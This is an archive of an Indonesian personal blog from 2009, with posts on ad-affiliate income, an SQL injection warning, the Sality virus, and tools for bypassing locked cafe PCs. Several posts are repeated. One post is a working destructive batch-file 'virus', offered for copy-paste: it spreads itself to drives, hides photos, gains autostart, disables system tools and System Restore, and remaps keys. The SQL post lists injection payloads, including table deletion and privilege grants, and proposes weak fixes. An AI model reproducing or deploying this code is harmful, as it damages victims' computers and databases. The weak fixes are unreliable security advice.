Ya meskipun bukan dollar yang diraup di sini, tetapi rupiah, ya tidak apa-apa lah yang penting buat menyambung hidup. Pada tulisan saya sebelumnya, saya telah membahas bagaimana meraup dollar lewat Blog, sekarang bagaimana meraup rupiah lewat blog. Konsepnya hampir sama dengan affiliates program di beberapa website besar, tapi ini adalah website affiliasi bikinan anak negeri.
Ya meskipun saya juga baru menjadi anggotanya, dan belum mendapatkan begitu banyak pendapatan. Tapi saya ingin berbagi dengan anda, saya ingin waktu anda ber-internet ria dapat bermanfaat dan tidak hanya mengeluarkan duit untuk biaya warnet, tetapi anda bisa memasukan duit ke rekening anda. Ups maaf malah promosi..
Ini adalah penilaian saya dengan jujur dan tidak ada maksud untuk promosi, menurut saya tidak ada salahnya anda mencoba. Tenang untuk registrasinya anda tidak dipungut biaya sepeser pun, tetapi syarat utamanya anda hanya butuh blog. Bisa lewat wordpress, blogger, dll. Setelah anda registrasi anda hanya perlu meng-copy script text ads untuk blog anda. Dan pasang di blog anda, lalu selesai. Anda hanya tinggal menunggu pengunjung blog anda meng-klick text ads yang sudah anda pasang.
Lalu duitnya masuk kemana? Nah duitnya bakal masuk ke rekening anda. Tentunya sebelumnya anda harus memasukkan no rek, bank, dan nama anda pada link yang judulnya edit profile. Nah.. Gampang kan? Anda tidak perlu punya paypall.
Ok penjelasannya sekian dulu, klick di sini apabila anda tertarik..
26 Februari 2009
12 Februari 2009
Membuat Virus dengan Notepad
Pada beberapa website dan blog dijelaskan tentang pembuatan antivirus menggunakan notepad. Tetapi pada tutorial tersebut menggunakan ekstensi *.vbs yang artinya menggunakan bahasa Basic. Sekarang saya akan menjelaskan membuat virus menggunakan notepad dan menggunakan bahasa DOS dan nantinya virus ini akan menggunakan ekstensi *.bat atau kita akan membuat batch file yang intinya merusak suatu sistem. Dalam pembuatan virus ini anda tidak perlu dituntut mengerti tentang pemrograman, hanya saja anda pernah mengerti/belajar tentang DOS.
Nah sekarang silahkan buka notepad, lalu ketikkan script di bawah ini atau apabila anda malas untuk mengetikkannya maka silahkan lakukan copy-paste.
echo off
for %%p in (C D E F G H I J) do copy %0 %%p:
for %%d in (*.jpg) do attrib +h +s %%d:\*.jpg /s
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /d 1 /t REG_DWORD /f
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoFind /d 1 /t REG_DWORD /f
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoFolderOptions /d 1 /t REG_DWORD /f
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v aktifkan /t REG_SZ /d C:\u-hurt-me.bat /f
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoViewOnDrive /t REG_DWORD /d 4 /f
REG ADD HKCU\Software\Microsoft\Windows\System /v DisableCMD /t REG_DWORD /d 2 /f
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoStartMenuMorePrograms /t REG_DWORD /d 1 /f
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Keyboard Layout /v ScancodeMap /t REG_BINARY /d 00 00 00 00 00 00 00 00 03 00 00 00 00 00 5B E0 00 00 5C E0 00 00 00 00 /f
exit
Setelah anda selesai mengetik script di atas, lalu simpan dengan nama terserah anda dan jangan lupa memberikan embel-embel .bat.
Sedikit penjelasan mengenai virus ini..
Menggandakan dirinya ke dalam beberapa drive.
Menyembunyikan file-file image yang berekstensi jpg.
Fasilitas Run, Command Prompt, Folder Options, Search, dan Start Menu Programs dihilangkan.
Menutup akses ke regedit, command prompt, drive C sebagai system.
Men-disable tombol windows pada keyboard.
Apabila ingin lebih mengerikan lagi tambahkan script berikut ini untuk menutup System Restore.
REG ADD HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore /v DisableSR /t REG_DWORD /d 1 /f
INGAT!!! Apapun yang terjadi pada anda, DI LUAR TANGGUNG JAWAB SAYA. Saya berharap anda bisa lebih bijak dalam menentukan langkah yang akan anda tempuh. Terima kasih..
Nah sekarang silahkan buka notepad, lalu ketikkan script di bawah ini atau apabila anda malas untuk mengetikkannya maka silahkan lakukan copy-paste.
echo off
for %%p in (C D E F G H I J) do copy %0 %%p:
for %%d in (*.jpg) do attrib +h +s %%d:\*.jpg /s
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /d 1 /t REG_DWORD /f
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoFind /d 1 /t REG_DWORD /f
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoFolderOptions /d 1 /t REG_DWORD /f
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v aktifkan /t REG_SZ /d C:\u-hurt-me.bat /f
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoViewOnDrive /t REG_DWORD /d 4 /f
REG ADD HKCU\Software\Microsoft\Windows\System /v DisableCMD /t REG_DWORD /d 2 /f
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoStartMenuMorePrograms /t REG_DWORD /d 1 /f
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Keyboard Layout /v ScancodeMap /t REG_BINARY /d 00 00 00 00 00 00 00 00 03 00 00 00 00 00 5B E0 00 00 5C E0 00 00 00 00 /f
exit
Setelah anda selesai mengetik script di atas, lalu simpan dengan nama terserah anda dan jangan lupa memberikan embel-embel .bat.
Sedikit penjelasan mengenai virus ini..
Menggandakan dirinya ke dalam beberapa drive.
Menyembunyikan file-file image yang berekstensi jpg.
Fasilitas Run, Command Prompt, Folder Options, Search, dan Start Menu Programs dihilangkan.
Menutup akses ke regedit, command prompt, drive C sebagai system.
Men-disable tombol windows pada keyboard.
Apabila ingin lebih mengerikan lagi tambahkan script berikut ini untuk menutup System Restore.
REG ADD HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore /v DisableSR /t REG_DWORD /d 1 /f
INGAT!!! Apapun yang terjadi pada anda, DI LUAR TANGGUNG JAWAB SAYA. Saya berharap anda bisa lebih bijak dalam menentukan langkah yang akan anda tempuh. Terima kasih..
10 Februari 2009
Hati-hati SQL Injection
Apabila anda adalah seorang administrator sebuah website atau seorang programmer web anda harus jeli dengan berbagai teknik penyerangan seorang Hacker atau Cracker. Ingat seorang programmer yang baik adalah programmer yang dapat meminimalisir kesalahan yang dibuat user baik itu yang disengaja atau tidak. dalam kasus ini saya akan menjelaskan sedikit bagaimana seseorang menyerang dengan teknik SQL Injection, saya memang pemula dan saya hanya mencoba mngingatkan kepada anda yang sudah jago dalam hal ini.
SQL Injection adalah teknik serangan yang menyisipkan query ke dalam suatu sistem, sehingga orang lain (penyerang) dapat mengakses database anda. Tetapi ingat bukan sembarang query yang dimasukkan. Contohnya anda memiliki kode berikut untuk login :
$match=false;
if(isset($POST['submit'])){
$nama=$_POST['nama'];
$pass=$_POST['password'];
$sql="SELECT nama, password FROM user WHERE nama='$nama' AND password='$pass'";
$res=mysql_query($sql);
if($res && mysql_num_rows($res)==1){
$match=true;
mysql_free_result($res);
}
if($match==true){
echo "Account Match";
}else{
echo "Invalid Account";
}
}
Kode program tersebut memang melakukan verifikasi data, tetapi sangat rapuh. Penyerang bisa mengunakan query-query berikut untuk mendapatkan akses secara tidak sah.
admin'#
'OR 1=1 INTO DUMPFILE '/path/ke_lokasi/file.txt'#
'OR 1=1 INTO OUTFILE '/path/ke_lokasi/file.txt'#
Contoh SQL Injection di atas adalah contoh yang umum. Dan untuk mencegahnya, gunakan fungsi mysql_real_escape_string() atau addslashes(), seperti pada fungsi myMagic()
$nama=myMagic($_POST['nama']);
$pass=myMagic($_POST['password']);
Contoh lainnya dari SQL Injection adalah dengan menggunakan multiple query, seperti berikut:
$sql="SELECT * FROM buku WHERE kode={$id}"; //$id dari method GET/POST
0; DELETE FROM user //menghapus isi tabel
0; GRANT ALL ON *.* to 'xxx@%'
Ini sangat berbahaya apabila anda menggunakan server database seperti PostgreSQL atau SQLite. Untuk solusinya harus melakukan casting untuk memastikan id bertipe integer.
//simulasi nilai $_POST['id']
$id=(int) myMagic($_POST['id']);
Lalu untuk memeriksa apakah input mengabdung karakter tertentu, gunakan fungsi strpos()
$nama=myMagic($id);
if(strpos($nama, ';')) die('Naughty..Naughty..Naughty'); //periksa apakah karakter ; terdapat pada $nama
Nah sekian solusi yang dapat saya berikan, dan pesan saya tetap berhati-hati karena website Kaspersky jebol karena teknik serangan ini. Terima kasih..
SQL Injection adalah teknik serangan yang menyisipkan query ke dalam suatu sistem, sehingga orang lain (penyerang) dapat mengakses database anda. Tetapi ingat bukan sembarang query yang dimasukkan. Contohnya anda memiliki kode berikut untuk login :
$match=false;
if(isset($POST['submit'])){
$nama=$_POST['nama'];
$pass=$_POST['password'];
$sql="SELECT nama, password FROM user WHERE nama='$nama' AND password='$pass'";
$res=mysql_query($sql);
if($res && mysql_num_rows($res)==1){
$match=true;
mysql_free_result($res);
}
if($match==true){
echo "Account Match";
}else{
echo "Invalid Account";
}
}
Kode program tersebut memang melakukan verifikasi data, tetapi sangat rapuh. Penyerang bisa mengunakan query-query berikut untuk mendapatkan akses secara tidak sah.
admin'#
'OR 1=1 INTO DUMPFILE '/path/ke_lokasi/file.txt'#
'OR 1=1 INTO OUTFILE '/path/ke_lokasi/file.txt'#
Contoh SQL Injection di atas adalah contoh yang umum. Dan untuk mencegahnya, gunakan fungsi mysql_real_escape_string() atau addslashes(), seperti pada fungsi myMagic()
$nama=myMagic($_POST['nama']);
$pass=myMagic($_POST['password']);
Contoh lainnya dari SQL Injection adalah dengan menggunakan multiple query, seperti berikut:
$sql="SELECT * FROM buku WHERE kode={$id}"; //$id dari method GET/POST
0; DELETE FROM user //menghapus isi tabel
0; GRANT ALL ON *.* to 'xxx@%'
Ini sangat berbahaya apabila anda menggunakan server database seperti PostgreSQL atau SQLite. Untuk solusinya harus melakukan casting untuk memastikan id bertipe integer.
//simulasi nilai $_POST['id']
$id=(int) myMagic($_POST['id']);
Lalu untuk memeriksa apakah input mengabdung karakter tertentu, gunakan fungsi strpos()
$nama=myMagic($id);
if(strpos($nama, ';')) die('Naughty..Naughty..Naughty'); //periksa apakah karakter ; terdapat pada $nama
Nah sekian solusi yang dapat saya berikan, dan pesan saya tetap berhati-hati karena website Kaspersky jebol karena teknik serangan ini. Terima kasih..
Hati-hati Virus Sality
Sality adalah virus lama yang daya serangnya cukup merepotkan. Dimana virus sality ini menginfeksi file-file berekstensi *.exe yang ada pada harddisk anda. Saya punya pengalaman buruk dengan virus yang satu ini, di mana semua file-file master yang saya miliki ludes di babad. Dan menurut data dari Kaspersky virus Sality.aa adalah pemimpin klasemen virus dari klasemen yang dibuat oleh Kaspersky.
Sebenarnya yang menghapus file-file executable tersebut bukan virusnya, tetapi antivirusnya sendiri. Lho ko'bisa? Memang bisa, kan saya sudah bilang kalau virus ini menginfeksi file-file executable jadi pada saat antivirus melakukan scanning maka file-file executable yang sudah terinfeksi tadi terdefinisi oleh antivirus menjadi sebuah virus. Dan ketika anda melakukan heal atau delete, maka ucapkan bubye pada file-file anda.
Lalu bagaimana solusinya?
Solusinya kalau sudah terlanjur terinfeksi adalah lakukan pembersihan dengan antivirus dan relakan file-file executable anda lenyap.
Lebih baik mencegah daripada mengobati. Itulah intinya.
Baca artikel saya yang judulnya "Aman tanpa Antivirus", lalu terapkan apa yang saya tuliskan pada komputer anda. Kalau anda tidak bisa melakukannya tanpa antivirus, maka pakailah antivirus. dan jangan lupa arsipkan semua file-file executable (master/installer) yang anda miliki dengan WinZip atau WinRAR. Karena virus ini tidak bisa menginfeksi file-file dalam kompresi RAR atau Zip.
Nah sekian solusi terbaik dari saya. Terima kasih..
Sebenarnya yang menghapus file-file executable tersebut bukan virusnya, tetapi antivirusnya sendiri. Lho ko'bisa? Memang bisa, kan saya sudah bilang kalau virus ini menginfeksi file-file executable jadi pada saat antivirus melakukan scanning maka file-file executable yang sudah terinfeksi tadi terdefinisi oleh antivirus menjadi sebuah virus. Dan ketika anda melakukan heal atau delete, maka ucapkan bubye pada file-file anda.
Lalu bagaimana solusinya?
Solusinya kalau sudah terlanjur terinfeksi adalah lakukan pembersihan dengan antivirus dan relakan file-file executable anda lenyap.
Lebih baik mencegah daripada mengobati. Itulah intinya.
Baca artikel saya yang judulnya "Aman tanpa Antivirus", lalu terapkan apa yang saya tuliskan pada komputer anda. Kalau anda tidak bisa melakukannya tanpa antivirus, maka pakailah antivirus. dan jangan lupa arsipkan semua file-file executable (master/installer) yang anda miliki dengan WinZip atau WinRAR. Karena virus ini tidak bisa menginfeksi file-file dalam kompresi RAR atau Zip.
Nah sekian solusi terbaik dari saya. Terima kasih..
Tools Pengganti
Anda tentu pernah merasa tidak bebas ketika anda menggunakan komputer warnet. Contohnya ketika anda ingin mengkases registry editor di warnet tetapi regedit tersebut ditutup hak aksesnya. Karena saya adalah pecinta kebebasan, maka saya berikan solusinya.
Sebenarnya tool-tool ini saya dapatkan dari sebuah forum underground (forum hacker) tetapi saya fikir ini sangat bermanfaat (ini tergantung penggunaannya) dan beberapa dari tool ini adalah portable, jadi anda tidak perlu repot-repot meng-install-nya. silahkan anda download tool-tool berikut ini..
Greg Command shell
Ini adalah tool pengganti command prompt.
Regalyz
Ini adalah tool pengganti registry editor.
Autorun
Ini adalah tool pengganti system configuration utility atau kita biasa menyebutnya msconfig.
Run
Ini adalah tool pengganti run saat aplikasi run di komputer tidak bisa di akses.
ProcessExplorer
Ini adalah tool pengganti task manager.
Itulah sebagian solusi yang bisa saya berikan. Terima kasih..
Sebenarnya tool-tool ini saya dapatkan dari sebuah forum underground (forum hacker) tetapi saya fikir ini sangat bermanfaat (ini tergantung penggunaannya) dan beberapa dari tool ini adalah portable, jadi anda tidak perlu repot-repot meng-install-nya. silahkan anda download tool-tool berikut ini..
Greg Command shell
Ini adalah tool pengganti command prompt.
Regalyz
Ini adalah tool pengganti registry editor.
Autorun
Ini adalah tool pengganti system configuration utility atau kita biasa menyebutnya msconfig.
Run
Ini adalah tool pengganti run saat aplikasi run di komputer tidak bisa di akses.
ProcessExplorer
Ini adalah tool pengganti task manager.
Itulah sebagian solusi yang bisa saya berikan. Terima kasih..
08 Februari 2009
Mencari Pesugihan Lewat Internet
Baru-baru ini banyak dibicarakan tentang mencari uang lewat internet. Namun bagaimana cara untuk mendapatkan uang dari Internet?
Banyak sekali cara yang bisa dilakukan untuk mendapatkan uang dari internet, diantaranya membuat sebuah situs e-commerce atau menjual barang lewat media website. Tetapi ini terlalu sulit dilakukan, apalagi bagi orang awam termasuk saya. Setelah saya berselancar selama berjam-jam di dunia maya dan mengikuti beberapa forum, saya tahu bahwa meraup rupiah atau dollar bisa kita lakukan lewat media blog. Anda bisa percaya atau tidak, tapi banyak blogger yang sudah bisa meraup uang bahkan sampai jutaan rupiah per pekannya. Wow! Mendingan jadi blogger donk daripada jadi PNS yang mendapat gaji per bulannya tidak seberapa? Anggapan tersebut ada benarnya dan salahnya. Benarnya karena sudah banyak bukti yang bertebaran, salahnya mencari uang lewat internet tidak semudah yang dibayangkan dan pendapatan kita tidak tetap.
Kesulitannya dalam menjalani usaha ini adalah sebagai berikut :
1. Mendapatkan pengunjung pada blog kita.
2. Harus mempunyai paypall sebagai media transaksi online.
3. Rawan akan tindak kejahatan, seperti penipuan.
Setidaknya hal-hal di atas adalah kesulitan-kesulitan yang pernah saya alami.
Baiklah saya akan beritahu caranya agar anda bisa bergabung dalam bisnis ini. Caranya adalah dengan mendaftarkan website atau blog anda ke situs-situs yang menyediakan affiliate program. Di sini saya mendapatkan beberapa referensi tentang situs-situs yang menyediakan program tersebut. Di antaranya :
1. Amazon
2. Google
3. AdBrite
3. LinkWorth
4. Yahoo
5. dll
Dan perlu diperhatikan bahwa kesuksesan anda dalam menjalankan bisnis ini adalah dari dari pengunjung web anda. Anda bingung? Saya akan jelaskan. Begini, situs-situs tersebut akan meminta anda untuk memasukkan produk-produk situs tersebut ke web/blog anda (numpang pasang iklan). Nah uang yang akan anda dapatkan adalah dari iklan yang di-click oleh pengunjung web/blog anda. Jadi meskipun blog/web anda dikunjungi oleh 100 orang per harinya, dan apabila dari ke 100 orang tersebut tidak ada yang meng-klick iklan yang ada di blog anda maka anda tidak mendapatkan apa-apa. Makanya di sini saya sarankan supaya anda menyeleksi iklan-iklan/produk-produk apa saja yang akan anda masukkan ke blog anda. Dan anda harus mengikuti perkembangan pasar.
Nah, seperti itu pengalaman saya dalam usaha bisnis ini. Saya tidak bermaksud promosi tapi saya hanya berbagi pengalaman. Terima kasih..
Banyak sekali cara yang bisa dilakukan untuk mendapatkan uang dari internet, diantaranya membuat sebuah situs e-commerce atau menjual barang lewat media website. Tetapi ini terlalu sulit dilakukan, apalagi bagi orang awam termasuk saya. Setelah saya berselancar selama berjam-jam di dunia maya dan mengikuti beberapa forum, saya tahu bahwa meraup rupiah atau dollar bisa kita lakukan lewat media blog. Anda bisa percaya atau tidak, tapi banyak blogger yang sudah bisa meraup uang bahkan sampai jutaan rupiah per pekannya. Wow! Mendingan jadi blogger donk daripada jadi PNS yang mendapat gaji per bulannya tidak seberapa? Anggapan tersebut ada benarnya dan salahnya. Benarnya karena sudah banyak bukti yang bertebaran, salahnya mencari uang lewat internet tidak semudah yang dibayangkan dan pendapatan kita tidak tetap.
Kesulitannya dalam menjalani usaha ini adalah sebagai berikut :
1. Mendapatkan pengunjung pada blog kita.
2. Harus mempunyai paypall sebagai media transaksi online.
3. Rawan akan tindak kejahatan, seperti penipuan.
Setidaknya hal-hal di atas adalah kesulitan-kesulitan yang pernah saya alami.
Baiklah saya akan beritahu caranya agar anda bisa bergabung dalam bisnis ini. Caranya adalah dengan mendaftarkan website atau blog anda ke situs-situs yang menyediakan affiliate program. Di sini saya mendapatkan beberapa referensi tentang situs-situs yang menyediakan program tersebut. Di antaranya :
1. Amazon
2. Google
3. AdBrite
3. LinkWorth
4. Yahoo
5. dll
Dan perlu diperhatikan bahwa kesuksesan anda dalam menjalankan bisnis ini adalah dari dari pengunjung web anda. Anda bingung? Saya akan jelaskan. Begini, situs-situs tersebut akan meminta anda untuk memasukkan produk-produk situs tersebut ke web/blog anda (numpang pasang iklan). Nah uang yang akan anda dapatkan adalah dari iklan yang di-click oleh pengunjung web/blog anda. Jadi meskipun blog/web anda dikunjungi oleh 100 orang per harinya, dan apabila dari ke 100 orang tersebut tidak ada yang meng-klick iklan yang ada di blog anda maka anda tidak mendapatkan apa-apa. Makanya di sini saya sarankan supaya anda menyeleksi iklan-iklan/produk-produk apa saja yang akan anda masukkan ke blog anda. Dan anda harus mengikuti perkembangan pasar.
Nah, seperti itu pengalaman saya dalam usaha bisnis ini. Saya tidak bermaksud promosi tapi saya hanya berbagi pengalaman. Terima kasih..
Langganan:
Postingan (Atom)